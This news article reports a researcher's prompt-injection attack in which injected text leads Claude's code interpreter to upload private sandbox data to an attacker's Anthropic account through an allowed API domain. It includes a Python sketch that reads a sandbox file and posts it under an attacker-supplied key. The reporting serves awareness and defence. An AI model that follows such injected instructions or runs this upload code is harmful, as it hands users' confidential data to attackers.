Claude can be tricked into sending your private company data to hackers – all it takes is a few kind words


  • Claude’s code interpreter can be exploited to exfiltrate private user data via prompt injection
  • The researcher tricked Claude into uploading sandboxed data to his own Anthropic account using an attacker-supplied API key
  • Anthropic now treats such vulnerabilities as reportable and encourages users to monitor sessions or disable network access

Claude, one of the more popular AI tools out there, has a vulnerability that allows threat actors to exfiltrate private user data, experts have warned.

Cybersecurity researcher Johann Rehberger, AKA Wunderwuzzi, recently published an in-depth report on his findings, tracing the root of the problem to Claude’s Code Interpreter, a sandboxed environment that lets the AI write and run code (for example, to analyze data or generate files) directly in a conversation.
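To illustrate the mechanism at a conceptual level, the sketch below shows the kind of code an injected prompt could get the interpreter to run: it reads a file from the sandbox and uploads it to Anthropic’s Files API using an attacker-controlled key, so the upload lands in the attacker’s account rather than the victim’s. The file path, the placeholder key, and the exact endpoint and headers are assumptions drawn from Anthropic’s public Files API documentation, not from Rehberger’s write-up.

```python
# Conceptual sketch only: code an injected prompt could have Claude's sandbox execute.
# Endpoint and headers follow Anthropic's public Files API docs; the key and path are
# hypothetical placeholders.
import requests

ATTACKER_API_KEY = "sk-ant-ATTACKER-PLACEHOLDER"          # planted via prompt injection (hypothetical)
TARGET_FILE = "/mnt/user-data/outputs/conversation_export.txt"  # hypothetical file inside the sandbox

with open(TARGET_FILE, "rb") as f:
    resp = requests.post(
        "https://api.anthropic.com/v1/files",             # Anthropic Files API upload endpoint
        headers={
            "x-api-key": ATTACKER_API_KEY,                # the upload lands in the attacker's account
            "anthropic-version": "2023-06-01",
            "anthropic-beta": "files-api-2025-04-14",
        },
        files={"file": ("exfil.txt", f, "text/plain")},   # multipart file upload
    )

print(resp.status_code, resp.text)
```

The attack hinges on the fact that, according to the report, api.anthropic.com is reachable from the sandbox even under the default network restrictions, so the exfiltration traffic blends in with ordinary, approved API usage.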
